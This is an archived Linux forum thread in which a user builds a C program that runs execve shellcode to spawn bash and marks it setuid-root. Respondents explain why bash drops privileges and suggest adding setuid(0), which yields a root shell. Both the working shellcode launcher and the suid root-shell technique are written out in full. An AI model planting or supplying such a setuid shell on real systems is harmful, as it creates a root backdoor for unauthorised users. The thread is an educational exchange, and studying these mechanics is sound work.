LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Programming (http://www.linuxquestions.org/questions/programming-9/)
-   -   Error in Shell prompt (http://www.linuxquestions.org/questions/programming-9/error-in-shell-prompt-4175450943/)

Arjun 02-20-2013 07:14 AM

Error in Shell prompt
 
I have made a script in C which spawns a shell. Here it is

Code:

#include<stdio.h>

char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43\x43";

main()
{
        int *ret;

        ret = (int *)&ret + 2;

        (*ret) = (int)shellcode;
}

I have made it as root & set it as suid by

Code:

chmod +s mycode
Now i have copied this file to a normal user's location & executed as normal user. So i have expected a root shell for the normal user but i got the bash shell as a normal user.

I dont understand why i am not getting root shell ?

According to the definition of SUID, it is
Quote:

If the SUID bit is set for any application then your user ID would be set as that of the owner of application/file rather than the current user, while running that application.
So what wrong i am doing ?

My OS info
Code:

Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
Thanks

NevemTeve 02-20-2013 09:49 AM

Please try to avoid using machine code instead of proper C-source. It has no advantage, except make you look stupid.

linosaurusroot 02-20-2013 10:18 AM

I expect bash is starting with ruid of the user but euid of root and in response to this it sets euid=ruid.

setuid(0) in the program before it does the implicit return might get you what you want. In a more realistic/useful setting you'd have a shellcode that starts with setuid(0) to deal with this.

Or you could run an interpreter such as perl instead of bash, set the uid in perl and finally exec bash.

Obviously we're expecting you not to run these on any systems you don't own.

chrism01 02-20-2013 11:37 PM

1. suid is not honoured by the kernel for 'scripts' ie non-compiled langs eg shell, Perl, Python etc
eg http://www.techrepublic.com/blog/ope...d-to-know/3785

2. as above 'Obviously we're expecting you not to run these on any systems you don't own.'

Arjun 02-21-2013 06:00 AM

Quote:

Originally Posted by linosaurusroot (Post 4896022)
I expect bash is starting with ruid of the user but euid of root and in response to this it sets euid=ruid.

setuid(0) in the program before it does the implicit return might get you what you want. In a more realistic/useful setting you'd have a shellcode that starts with setuid(0) to deal with this.

Or you could run an interpreter such as perl instead of bash, set the uid in perl and finally exec bash.

Obviously we're expecting you not to run these on any systems you don't own.

Thanks linosaurusroot, It worked.....
I got root from your solution.
Here is the final code which worked
Code:

#include<stdio.h>

char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43\x43";

main()
{
        int *ret;

        ret = (int *)&ret + 2;
        setuid(0);
        (*ret) = (int)shellcode;
}

Can you explain me what does setuid(0) does here ?
What is its use ?

Thanks

linosaurusroot 02-21-2013 06:15 AM

Quote:

Originally Posted by Arjun (Post 4896604)
Can you explain me what does setuid(0) does here ?

At a time when your process has euid=0 (meaning root) and ruid=50000 or whatever for your account calling setuid(0) will set ruid=0. After that both ruid and euid will be the same so when bash starts it won't change euid back to 50000.

Much more detail at http://www.cs.berkeley.edu/~daw/pape...d-usenix02.pdf
in fact it's good to have a look regularly at http://www.cs.berkeley.edu/~daw/papers/ where DAW posts educational stuff.

Arjun 02-21-2013 06:22 AM

Quote:

Originally Posted by linosaurusroot (Post 4896620)
At a time when your process has euid=0 (meaning root) and ruid=50000 or whatever for your account calling setuid(0) will set ruid=0. After that both ruid and euid will be the same so when bash starts it won't change euid back to 50000.

Much more detail at http://www.cs.berkeley.edu/~daw/pape...d-usenix02.pdf
in fact it's good to have a look regularly at http://www.cs.berkeley.edu/~daw/papers/ where DAW posts educational stuff.

Thanks for explanation. Got it now


All times are GMT -5. The time now is 07:49 AM.